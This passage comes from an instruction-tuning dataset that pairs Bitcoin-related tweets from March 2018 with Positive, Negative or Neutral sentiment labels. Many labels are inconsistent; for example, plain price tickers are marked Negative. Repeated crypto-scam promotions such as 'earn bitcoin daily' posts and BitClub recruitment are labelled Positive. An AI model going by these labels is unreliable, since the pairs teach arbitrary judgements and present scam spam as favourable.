"Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "There is only one Bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@8bitandstuff We have to dump nobbs in $bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@JoelOsteen Heaven Helps Those who Help Themselves. Get Started with Bitcoin trade and Earn over $12,000 Weekly. Follow the Right Part.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Cointelegraph This debate about what coins are, including Bitcoin, is really stupid.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Egon_01 @Nicknameul @el33th4xor on the bitcoin network? \ud83d\ude26why not bitcoin cash? blocks too big?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC-SIB AskRate: 0.00014245 #Bittrex #SIB $SIB #Siberian Chervonets #altcoin #bitcoin #cryptocurrencies\n \u2665 FOLLOW for PROFIT", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8429.78 / 6834.283\u20ac\n1 bitcoin-cash = $966.927 / 783.917\u20ac\n1 ethereum = $517.549 / 419.593\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@HoldenCrypfield Bitcoin isn't a company.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8396.97", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@nakamotech fan: h\nwinwin: i accept credit debit bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin drops over 4% after Japan warns largest operator #Market", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@officialmcafee so when is your $1M bitcoin price call gona happen?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@SiLoMixMaster @BigCheds Icon is gaining while Bitcoin is dropping arm \ud83e\udd11\ud83e\udd11", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "aEarn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Blocked by @wmiddelkoop because of #Bitcoin and #Crypto -- Bullish!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Litecoin bitcoin safest but plenty others quite safe", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@WhalePanda Whale is bitcoin and litecoin \u26a1\ufe0fatomic swap \ud83d\udd1cThere wasn\u2019t no update on the last show.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin, obvs..", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@contestpal How many RS. in a Bitcoin?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Is Bitcoin Cash [BTG] dying a slow death @360_trader? #BTC #bitcoin #TA", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "23% of Lost Bitcoin May Never Be Recovered~ TimeBox will fix the problem in future!\n\n#BTC #ETH #Timebox", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30394.88877000 | BITCOIN(BLCHAIN) R$27791.66 | LITECOIN(MCDTBC) R$573.33000000", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Nigga had 40 bitcoin on a flash drive", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@eco is a pretty awesome concept..if it succeeds, I see myself using it\n\n#eco #bitcoin #crypto #blockchain", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bad news: Bitcoin on the decline.\nCurrent Rate: 8383.1 USD = 1 BTC", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ #1, Bitcoin with unit price of $8,415.39, market cap of $142,511,053,109 (44.31%), and 24 hr vol. of $5,562,470,000 (37.71%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Mar 23, 2018 12:00AM #Bitcoin Price:\nUSD 8634.59 | EUR 7012.58 | JPY 914988.62", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Average Bitcoin market price is: USD 8,382.36, EUR 6,803.94", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin - BTC\nPrice: $8,422.22\nChange in 1h: -0.32%\nMarket cap: $142,626,716,256.00\nRanking: 1\n#Bitcoin #BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8415.39\nEthereum:$517.299\nBitcoin Cash:$969.716\nLitecoin:$158.245\nRipple:$0.634575\nIOTA:$1.26241", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8415.39 / 6822.617\u20ac\n1 bitcoin-cash = $967.81 / 784.633\u20ac\n1 ethereum = $517.35 / 419.431\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "2018-03-23 07:00 UTC Bitcoin Price: 8383.70 USD", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Buy? Sell? Or wait? Daily Forecasts for EURUSD, GBPUSD, USDJPY, Bitcoin, etc. on Daily, Weekly and Monthly charts. #ForexTips", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 #BTC (#Bitcoin) quotes:\n$8375.55/$8383.69 #Bitstamp\n$8368.09/$8373.98 #Kraken\n\u21e2$-15.60/$-1.57\n$8321.19/$8404.84 #Coinbase\n\u21e2$-62.50/$29.29", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Top 6 BTC/USD Exchange Orderbooks: Resistance til $8600:$25.0M; Support til $8100:$50.4M $BTC $BTCUSD #bitcoin #orderbook #crypto #markets", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Monthly Web Traffic for Major Bitcoin Exchanges Falls by Half #ico #cryptocurrency #token", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003298 (-0.00000008) #BTC / 0.276503 (-0.00132) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002259 (+0.00000004) #BTC / 0.189401 (-0.00015) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0474978 (-0.00038850) #BTC / 398.212 (-4.25500) #USD. Market rank is 12. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004444 (-0.00000092) #BTC / 0.372594 (-0.00866) #USD. Market rank is 117. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00077674 (-0.00000378) #BTC / 6.51204 (-0.04799) #USD. Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC hourly update\n$8394.84 | -0.0018%\ud83d\udcc9\n$BTC #BTCUSD #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#xatracoin is wonderful project. Don't miss it! #XTR #ICO #XATRA #Blockchain #Coin #BTC #bitcoin #ETH #Ethereum", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin $8,381.78 v #BitcoinCash $965.99 (BTC/BCH 8.7), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 16:00JST", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current price of Bitcoin is $8476.41.\nThe current price of BCash is $974.314, or 0.115429 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Change publishing forever Accept #bitcoin payments ask thehumanfaucet to get started #askastoreaday", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 via @Chain #bitcoin #finance", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current #Bitcoin price: $8376.47", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 \u201cLike\u201d if thats good for you and \u201cretweet\u201d if thats not good for you #bitcoin #btc #bitcoinprice", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I earn R36000 a month \nInbox for a relationship. \n#TrapaDrive \n#SaWasABetterPlaceBefore \n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "ToysRus Everyday you miss not accepting #bitcoin ,is money lost, can you afford another year like this? thehumanfaucet will get you started", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin 8376.47 $", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current price of Bitcoin is $8476.41.\nThe current price of BCash is $974.314, or 0.115429 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "CRYPTOCURRENC Give responds by cutting taxes and increase spending, currency devalues bitcoin soars #cryptonews #crypto #altcoins", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 #Bitcoin #Finance #Entrepreneur", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 $BTC You down?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#FYI Current price of #Bitcoin is $8376.47", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Cryptobot reporting that 1 Bitcoin is now 8376.47 USD! #bitcoin #cryptocurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN\nJOIN BITCLUB NETWORK!!\n[Virtual currency mining Encryption currency]", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN\nJOIN BITCLUB NETWORK! !", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 via @BTCpx #BTC $BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin $btc is $8376.47", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin is $8376.47", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Monthly Web Traffic for Major Bitcoin Exchanges Falls by Half #ico #cryptocurrency #token", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin is $8376.47", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin Price 8376.47 USD via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@RampCapitalLLC if #Bitcoin isn\u2019t $10Trillion by next week, I will eat my breakfast live on Facebook.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8718.74 via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@alextohme Well @jack thinks the whole world will be on some form of global bitcoin in 10years - so all the $$ mean nothing \ud83d\ude02\ud83d\ude02", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Good morning! The current price of Bitcoin is $8376.47.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Malowbar Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bitcoin What? Lol", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Monthly Web Traffic for Major Bitcoin Exchanges Falls by Half #ico #cryptocurrency #token #ROX #Robotinaico", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $9026.40 @Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8610.90 @Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "DataBroker DAO is the first marketplace to trade sensor data \n#internetofthings #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ElongWilliam @barichnel We have many children of bitcoin like litecoin, coinbase.\nPm me for more information about it", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 #Bitcoin #Bithound", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@realDonaldTrump It's time to buy Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$ZECUSD entering oversold zone on interval 60m #cryptocurrency #trading #bitcoin #crypto #technicalanalysis", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Sets your bar high, even if you fail. #Crypto #Bitcoin #Ethereum #Neo #ETN #Litecoin #JACKMATE", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@officialmcafee @theemrsmcafee Your ding dong is safe. #Bitcoin #Litecoin #Ethereum #Monero #NEO #HODL", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$BTCUSD entering oversold zone on interval 60m #cryptocurrency #trading #bitcoin #crypto #technicalanalysis", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC $8415.39 Down -$21.75 -0.26% in the last hour #bitcoin #bitsmart", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CryptoCountant Come on Bitcoin do your thing so i can buy some cheap WAN", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin BTC Current Price:\n$8.422,220\n1 Hour: -0.32 % | 24 Hours: -6.66 % | 7 Days: 2.84 %\n#btc #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8449.41 / 6850.198\u20ac\n1 bitcoin-cash = $970.175 / 786.55\u20ac\n1 ethereum = $517.205 / 419.314\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The technology is not under threat at all, it is extraordinary, highly successful #pauldavis #bitcoin #bitcoins #bitcoinworld", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Kept my head down for couple weeks. Whats the news in crypto.........same as everyday, sweet. #crypto #bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": ":( :( ....[Bitcoin performance assessment (-0.58%)] #bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8427.19", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\ud83c\udf08 Status Update: Tracking 314 Bitcoin addresses with a current balance of 162.65K BTC / 1.37B USD\n#bitcoin #cryptopaymon \ud83e\udd16", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@enekoknorr Fortunately (for them) most of it on Bitcoin.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current Bitcoin Price = $9428.13 --- Includes Sum of Forks, Core $8406.00 (89.16%) + Cash $964.97 (10.23%) + Gold $57.16 (0.61%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@TheCryptoDog Never heard of them. Is that like the bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current price of Bitcoin is $8449.41.\nThe current price of BCash is $970.175, or 0.115625 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Use your browser to passively mine bitcoin and receive mining rewards instantly to your account, credited every hour.start is\u2192http://freebit", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin Cash BCH Current Price:\n$973,353\n1 Hour: 0.04 % | 24 Hours: -7.08 % | 7 Days: 5.85 %\n#bch #bitcoin cash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 08:17:22 2018 (69:54)\nUSD : 8416.92\nWght: 0.42\nBlk#: 514767\nSize: 1050.1 KB\nTXs: 2151\nPool: 6729 (4.3 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zebpay TCC is Next Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@officialmcafee @theemrsmcafee JAPAN FUD = BITCOIN CRASH. Every FUD = crash. Bubble has burst.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 00000000000000000046e410eb1454e5ba5c83eb5df6253414a3127e02e3ed9a mined at height 514767.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "NEO is now \u00a345.88. #crypto #cryptocurrency #bitcoin #altcoins", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8440.96 / 6843.347\u20ac\n1 bitcoin-cash = $973.353 / 789.127\u20ac\n1 ethereum = $517.037 / 419.177\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ssohanurrahman2 what price did you first get into Bitcoin at?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Pls I wanna go into bitcoin business. Anyone with advice please help I don't wanna lose my cash.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Join the comunnity #bitcoin #cryptocurrency #alts #ALTSEASON #Blockchain #Forum #Airdrops #BountyProgram", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@RealJamesWoods @dtannie Forgot to say, thanks, Woods. #bitcoin BoycottCosco", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 08:25:11 2018 (7:49)\nUSD : 8398.21\nWght: 0.42\nBlk#: 514768\nSize: 1125.3 KB\nTXs: 2223\nPool: 5350 (3.7 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 000000000000000000303b4f6effdf147d5954ca6a640d7b78bf09a99b57f36b mined at height 514768.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bitcoin Doesn\u2018t look very centralized to me, tbh", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": ":( :( ....[Bitcoin performance assessment (-0.24%)] #bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Dark_Realist @LuminousNebulae @hellosugoi @bitcoinmom @La__Cuen I love, love, love my Bitcoin family. \u2698\u2698\u2698", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bitfinexed Even DMM in Japan is dealing with Bitcoin now, why gave the profits and advantages to the shity Chinese Tether exchange?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC-SEQ AskRate: 0.00002180 #Bittrex #SEQ $SEQ #Sequence #altcoin #altcoins #bitcoin\n \u2665 FOLLOW for PROFIT", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8437.33\nEthereum:$515.595\nBitcoin Cash:$971.782\nLitecoin:$158.2\nRipple:$0.632992\nIOTA:$1.25814", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8437.33 / 6840.404\u20ac\n1 bitcoin-cash = $969.847 / 786.285\u20ac\n1 ethereum = $514.437 / 417.07\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "One Bitcoin now worth $8407.38@bitstamp. High $9025.000. Low $8342.000. Market Cap $142.372 Billion #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003286 (-0.00000012) #BTC / 0.27662 (+0.00012) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004490 (+0.00000046) #BTC / 0.377967 (+0.00537) #USD. Market rank is 117. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002263 (+0.00000004) #BTC / 0.189696 (+0.00029) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00077847 (+0.00000173) #BTC / 6.52517 (+0.01313) #USD. Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0475073 (+0.00000950) #BTC / 398.208 (-0.00400) #USD. Market rank is 12. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@joshkettle1 He\u2019ll be a bust #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Sooner or later people are gonna realise that compared to bitcoin most alts are just zimbabwe dollars. I think.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Hello humans, #Bitcoin is currently around $8434.47 as of Fri Mar 23 02:31:09 CDT 2018", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8405.7", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@rogerkver @Falkvinge Bitcoin Cash is zimbabwe dollars compared to bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Cyrii_Lightning maybe not bitcoin but thats a cool concept for sure\nlike an economy death note type deal", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "9/10\ud83c\udf0d\nIf you personalize losses, you can't trade\n\n$btc $alts #bitcoin #cryptocurrency #investing #trading", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "so wassup with these bitcoin ATM's? \ud83e\udd14", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin hasn't went up or down $100 in the past five hours...boring", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zebpay TCC (The Champ Coin) first and best Indian crypto currency who became next bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CNBC Bitcoin is only theoretically pure. It can easily (and is) be controlled by single entities", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "for all the flaws in sex at least it will never be the next bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Short term Bitcoin is going down, wait for a big dip to buy", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I just won free 20 satoshi from WeLoveBitcoin \ud83d\ude0d #bitcoin #faucet #satoshi #freebitcoin @welovefaucet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow 